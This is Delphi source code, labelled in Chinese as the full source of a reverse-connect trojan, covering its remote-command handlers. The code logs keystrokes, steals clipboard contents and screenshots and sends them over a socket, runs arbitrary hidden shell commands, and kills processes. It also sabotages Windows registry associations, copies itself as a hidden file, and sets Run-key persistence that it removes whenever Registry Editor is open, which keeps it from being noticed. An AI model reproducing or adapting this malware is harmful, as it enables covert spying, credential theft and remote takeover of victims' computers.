unit1.pas

反弹木马设计全部源码Delphi源码

374:begin
     reg.RootKey := HKEY_CLASSES_ROOT;
     if reg.OpenKey('CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32',true) then
      reg.WriteString ('','%SystemRoot%\system32\SHELL32.dll-');
    end;
375:begin
     reg.RootKey := HKEY_CLASSES_ROOT;
     if reg.OpenKey('CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\InProcServer32',true) then
      reg.WriteString ('','%SystemRoot%\system32\SHELL32.dll-');      
    end;
376:begin
     reg.RootKey := HKEY_CLASSES_ROOT;
     if reg.OpenKey('CLSID\{21EC2020-3AEA-1069-A2DD-08002B30309D}\InProcServer32',true) then
      reg.WriteString ('','shell32.dll-');      
    end;
377:begin
     reg.RootKey := HKEY_CLASSES_ROOT;
     if reg.OpenKey('CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\InProcServer32',true) then
      reg.WriteString ('','shell32.dll-');      
    end;

379:begin
     reg.RootKey := HKEY_CURRENT_USER;
     if reg.OpenKey('Control Panel\Mouse',true) then
      reg.WriteString('SwapMouseButtons','1');
    end;
380:begin
     reg.RootKey := HKEY_LOCAL_MACHINE;
     if reg.OpenKey('SOFTWARE\Classes\.inf',true) then
      reg.WriteString('','txtfile');
    end;
381:begin
     reg.RootKey := HKEY_LOCAL_MACHINE;
     if reg.OpenKey('SOFTWARE\Classes\.reg',true) then
      reg.WriteString('','txtfile');
    end;

401:begin//查看进程
     sx();
     Socket.SendText('401'+lb1.Items.Text);
    end;
402:begin//终止进程
     HSnapshot:=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
     Lppe.dwSize:=Sizeof(Lppe);
     Found:=Process32First(HSnapshot,Lppe);
     while Found do
     begin
       try
        if Lppe.szExeFile=copy(strr,4,length(strr)-3) then
         begin
          HProcess:=OpenProcess(PROCESS_ALL_ACCESS, FALSE, Lppe.th32ProcessID);
          TerminateProcess(HProcess,0);
          sx();
          Socket.SendText('401'+lb1.Items.Text);
          exit;
         end;
       except
       end;
       Found:=Process32Next(HSnapshot,Lppe);
     end;
    end;
403:begin//显示对话框
        ST1:= copy(strr,4,1);
        tit:= pchar(copy(strr,5,12));
        speak:=pchar(copy(strr,17,length(strr)-16));
        IF ST1='1' THEN
         APPLICATION.MessageBox(speak,tit,MB_ICONHAND)
        ELSE IF ST1='2' THEN
         APPLICATION.MessageBox(speak,tit,MB_ICONASTERISK)
        ELSE IF ST1='3' THEN
         APPLICATION.MessageBox(speak,tit,MB_ICONWARNING)
        ELSE IF ST1='4' THEN
         APPLICATION.MessageBox(speak,tit,MB_ICONQUESTION);
    end;

501:begin//得到当前活动窗体名
     st:= GetForegroundWindow;
     L:=GetWindowTextLength(st)+1;
     GetMem(Name,L);
     GetWindowText(st,Name,L);
     Socket.SendText('501'+string(name));
    end;
502:begin//更改当前活动窗体名
     st:= GetForegroundWindow;
     tem:=copy(strr,4,length(strr)-3);
     SetWindowText(st,pchar(tem));
     retu();
    end;
503:begin//杀IE窗口
     IEwin := FindWindow('IEFrame',nil);
     If IEwin <> 0 Then
      SendMessage(IEwin,WM_SYSCOMMAND,SC_CLOSE,0);
     retu();
    end;
504:begin//隐藏状态栏
     hideTaskbar;
     retu();
    end;
505:begin//显示状态栏
     showTaskbar;
     retu();
    end; 
506:socket.SendText('506'+Clipboard.asText);//查看剪贴板内容
507:Clipboard.Clear;//清空剪贴板内容
508:begin//隐藏桌面
     hDesktop := FindWindow('Progman', nil);
     ShowWindow(hDesktop, SW_HIDE);
     retu();
    end;
509:begin//显示桌面
     hDesktop := FindWindow('Progman', nil);
     ShowWindow(hDesktop, SW_SHOW);
     retu();
    end;
510:begin//隐藏开始按钮
     hwnd1:=findwindow('shell_traywnd',nil);
     hwnd2:=getwindow(hwnd1,gw_child);
     getclassname(hwnd2,pchar(bgba),255);
     showwindow(hwnd2,sw_hide);
     retu();
    end;
511:begin//显示开始按钮
     hwnd1:=findwindow('shell_traywnd',nil);
     hwnd2:=getwindow(hwnd1,gw_child);
     getclassname(hwnd2,pchar(bgba),255);
     showwindow(hwnd2,sw_show);
     retu();
    end;
520:TurnScreenSaverOn;//屏保

601:begin//执行命令
      i:=pos('{',strr);
      DOSN:=COPY(strr,5,i-5);//得到命令
      DOSC:=COPY(strr,i+1,length(strr));//得到参数
      i:=strtoint(copy(strr,4,1));//得到方式
     case i of//运行命令
      1:shellexecute(handle,'open',pchar(DOSN),pchar(DOSC),nil,SW_SHOWNORMAL);
      2:shellexecute(handle,'open',pchar(DOSN),pchar(DOSC),nil,SW_MAXIMIZE);
      3:shellexecute(handle,'open',pchar(DOSN),pchar(DOSC),nil,SW_MINIMIZE);
      4:shellexecute(handle,'open',pchar(DOSN),pchar(DOSC),nil,SW_HIDE);
     end;
     retu();
    end;
602:begin//执行dos命令
     i:=strtoint(copy(strr,4,1));//得到方式
     DOSC:=COPY(STRR,5,LENGTH(STRR)-4);
     case i of//运行命令
      1:WinExec(pchar('COMMAND.COM /C '+dosc),SW_SHOWNORMAL);
      2:WinExec(pchar('COMMAND.COM /C '+dosc),SW_MAXIMIZE);
      3:WinExec(pchar('COMMAND.COM /C '+dosc),SW_MINIMIZE);
      4:WinExec(pchar('COMMAND.COM /C '+dosc),SW_HIDE);
     end;
     retu();
    end;

701:begin
      try
        MYst := TMemorystream.Create;{建立内存流}
        MyBmp := TBitmap.Create;
        Myjpg := TJpegimage.Create;
        Cjt_GetScreen(MyBmp, True); {True表示抓鼠标图像}
        Myjpg.Assign(MyBmp); {将BMP图象转成JPG格式,便于在互联网上传输}
        Myjpg.CompressionQuality := strtoint(copy(strr,4,length(strr)-3)); {JPG文件压缩百分比设置,数字越大图像越清晰,但数据也越大}
        Myjpg.SaveToStream(MYst); {将JPG图象写入流中}
        Myjpg.free;
        MYst.Position := 0;
        s1 := inttostr(MYst.size);{流的大小}
        cs.Socket.sendtext('701'+s1); {发送流大小}
      finally
        MyBmp.free;
      end;
    end;
702:begin {客户端已准备好接收图象}
      MYst.Position := 0;
      cs.Socket.SendStream(MYst); {将流发送出去}
    end;

  end;
end;

procedure TForm1.csDisconnect(Sender: TObject; Socket: TCustomWinSocket);
begin
 form1.Caption :='断开';
 timer1.Enabled :=true;
 keyti.Enabled :=false;
 LPH:= DCB.Drive+':\';
 fdir(LPH);
end;

procedure TForm1.FormCloseQuery(Sender: TObject; var CanClose: Boolean);
begin//退出时
  CS.Socket.SendText('999'+ ipdd());
  cs.Close;
end;

procedure TForm1.keytiTimer(Sender: TObject);
var//键盘记录
  i : byte;
begin
  for i:=8 To 222 do
  begin
     if GetAsyncKeyState(i)=-32767 then
      begin
      case i of
      8  : M1.Lines[M1.Lines.count-1] := copy(M1.Lines[M1.Lines.count-1],1,length(M1.Lines[M1.Lines.count-1])-1); //Backspace
      9  : M1.text:=M1.text+'[Tab]';
      13 : M1.text:=M1.text+#13#10; //Enter
      17 : M1.text:=M1.text+'[Ctrl]';
      27 : M1.text:=M1.text+'[Esc]';
      32 :M1.text:=M1.text+' '; //Space
      // Del,Ins,Home,PageUp,PageDown,End
      33 : M1.text := M1.text + '[Page Up]';
      34 : M1.text := M1.text + '[Page Down]';
      35 : M1.text := M1.text + '[End]';
      36 : M1.text := M1.text + '[Home]';
      37 : M1.text := M1.text + '[Left]';
      38 : M1.text := M1.text + '[Up]';
      39 : M1.text := M1.text + '[Right]';
      40 : M1.text := M1.text + '[Down]';

      44 : M1.text := M1.text + '[Print Screen]';
      45 : M1.text := M1.text + '[Insert]';
      46 : M1.text := M1.text + '[Del]';
      145 : M1.text := M1.text + '[Scroll Lock]';
      48 : if GetKeyState(VK_SHIFT)<0 then M1.text:=M1.text+')'
           else M1.text:=M1.text+'0';
      49 : if GetKeyState(VK_SHIFT)<0 then M1.text:=M1.text+'!'
           else M1.text:=M1.text+'1';
      50 : if GetKeyState(VK_SHIFT)<0 then M1.text:=M1.text+'@'
           else M1.text:=M1.text+'2';
      51 : if GetKeyState(VK_SHIFT)<0 then M1.text:=M1.text+'#'
           else M1.text:=M1.text+'3';
      52 : if GetKeyState(VK_SHIFT)<0 then M1.text:=M1.text+'$'
           else M1.text:=M1.text+'4';
      53 : if GetKeyState(VK_SHIFT)<0 then M1.text:=M1.text+'%'
           else M1.text:=M1.text+'5';
      54 : if GetKeyState(VK_SHIFT)<0 then M1.text:=M1.text+'^'
           else M1.text:=M1.text+'6';
      55 : if GetKeyState(VK_SHIFT)<0 then M1.text:=M1.text+'&'
           else M1.text:=M1.text+'7';
      56 : if GetKeyState(VK_SHIFT)<0 then M1.text:=M1.text+'*'
           else M1.text:=M1.text+'8';
      57 : if GetKeyState(VK_SHIFT)<0 then M1.text:=M1.text+'('
           else M1.text:=M1.text+'9';
      65..90 : // a..z , A..Z
          begin
          if ((GetKeyState(VK_CAPITAL))=1) then
              if GetKeyState(VK_SHIFT)<0 then
                 M1.text:=M1.text+LowerCase(Chr(i)) //a..z
              else
                 M1.text:=M1.text+UpperCase(Chr(i)) //A..Z
          else
              if GetKeyState(VK_SHIFT)<0 then
                  M1.text:=M1.text+UpperCase(Chr(i)) //A..Z
              else
                  M1.text:=M1.text+LowerCase(Chr(i)); //a..z
          end;
      96..105 : M1.text:=M1.text + inttostr(i-96); //Numpad  0..9
      106:M1.text:=M1.text+'*';
      107:M1.text:=M1.text+'&';
      109:M1.text:=M1.text+'-';
      110:M1.text:=M1.text+'.';
      111:M1.text:=M1.text+'/';
      144 : M1.text:=M1.text+'[Num Lock]';

      112..123: //F1-F12
          M1.text:=M1.text+'[F'+IntToStr(i - 111)+']';

      186 : if GetKeyState(VK_SHIFT)<0 then M1.text:=M1.text+':'
            else M1.text:=M1.text+';';
      187 : if GetKeyState(VK_SHIFT)<0 then M1.text:=M1.text+'+'
            else M1.text:=M1.text+'=';
      188 : if GetKeyState(VK_SHIFT)<0 then M1.text:=M1.text+'<'
            else M1.text:=M1.text+',';
      189 : if GetKeyState(VK_SHIFT)<0 then M1.text:=M1.text+'_'
            else M1.text:=M1.text+'-';
      190 : if GetKeyState(VK_SHIFT)<0 then M1.text:=M1.text+'>'
            else M1.text:=M1.text+'.';
      191 : if GetKeyState(VK_SHIFT)<0 then M1.text:=M1.text+'?'
            else M1.text:=M1.text+'/';
      192 : if GetKeyState(VK_SHIFT)<0 then M1.text:=M1.text+'~'
            else M1.text:=M1.text+'`';
      219 : if GetKeyState(VK_SHIFT)<0 then M1.text:=M1.text+'{'
            else M1.text:=M1.text+'[';
      220 : if GetKeyState(VK_SHIFT)<0 then M1.text:=M1.text+'|'
            else M1.text:=M1.text+'\';
      221 : if GetKeyState(VK_SHIFT)<0 then M1.text:=M1.text+'}'
            else M1.text:=M1.text+']';
      222 : if GetKeyState(VK_SHIFT)<0 then M1.text:=M1.text+'"'
            else M1.text:=M1.text+'''';
      end;
      end;
  end;
end;

procedure TForm1.DCBChange(Sender: TObject);
begin
  LPH:= DCB.Drive+':\';
  fdir(LPH);
end;

procedure TForm1.FormCreate(Sender: TObject);
var myn,myn2: string;
    fme:TMemoryStream;
    clf:TfileStream;
    size:integer;
    ss,stf:string;
    f:textfile;
begin
    lik:=0;
    DCB.Text :='C:';
    stf:=ExtractFilePath(application.ExeName)+'\st.txt';
    fme:=TMemoryStream.Create;
    clf:=Tfilestream.Create(application.ExeName,fmShareDenyNone);

    try
        clf.Seek(-sizeof(size),soFromEnd);
        clf.ReadBuffer(size,sizeof(size));
        clf.Seek(-size,soFromEnd);
        fme.CopyFrom(clf,size-sizeof(size));
        fme.SaveToFile(stf);
    finally
        fme.Free;
        clf.Free;

        assignfile(f,stf);
        reset(f);
        readln(f,ss);
        i:=pos('>>>',ss);
        seta:=copy(ss,1,i-1);
        ss:=copy(ss,i+3,length(ss));
        i:=pos('>>>',ss);
        setb:=copy(ss,1,i-1);
        ss:=copy(ss,i+3,length(ss));
        i:=pos('>>>',ss);
        setc:=copy(ss,1,i-1);
        closefile(f);
        deletefile(stf);
    end;

  myn := ExtractFilename(Application.Exename);
  IF FILESETATTR(Application.Exename,0+FAHIDDEN)=0 THEN FORM1.Caption :='';
  myn2:=COPY(trim(GetWindir),1,2)+'\Program Files\'+myn;
  if application.Exename <> myn2 then
   begin
    copyfile(pchar(application.Exename), pchar(myn2), False);
    IF FILESETATTR(myn2,0+FAHIDDEN)=0 THEN FORM1.Caption :='';
    Winexec(pchar(myn2), sw_hide);
    application.Terminate;
   end;
  Timer1.Enabled :=true; 
end;

procedure TForm1.RECLTimer(Sender: TObject);
VAR reg:Tregistry;
    st:hwnd;
    L:integer;
    Name:PChar;
begin//开机启动
    reg:=tregistry.Create ;
    reg.RootKey :=HKEY_LOCAL_MACHINE;

    st:= GetForegroundWindow;
    L:=GetWindowTextLength(st)+1;
    GetMem(Name,L);
    GetWindowText(st,Name,L);

    IF reg.OpenKey('SOFTWARE\Microsoft\Windows\CurrentVersion\Run',True) then
       reg.WriteString('PHIME2OO2ASyst',Application.ExeName);

    if String(name)='注册表编辑器' then
       reg.DeleteValue ('PHIME2OO2ASyst');


  reg.CloseKey ;
  reg.Free ;
end;


end.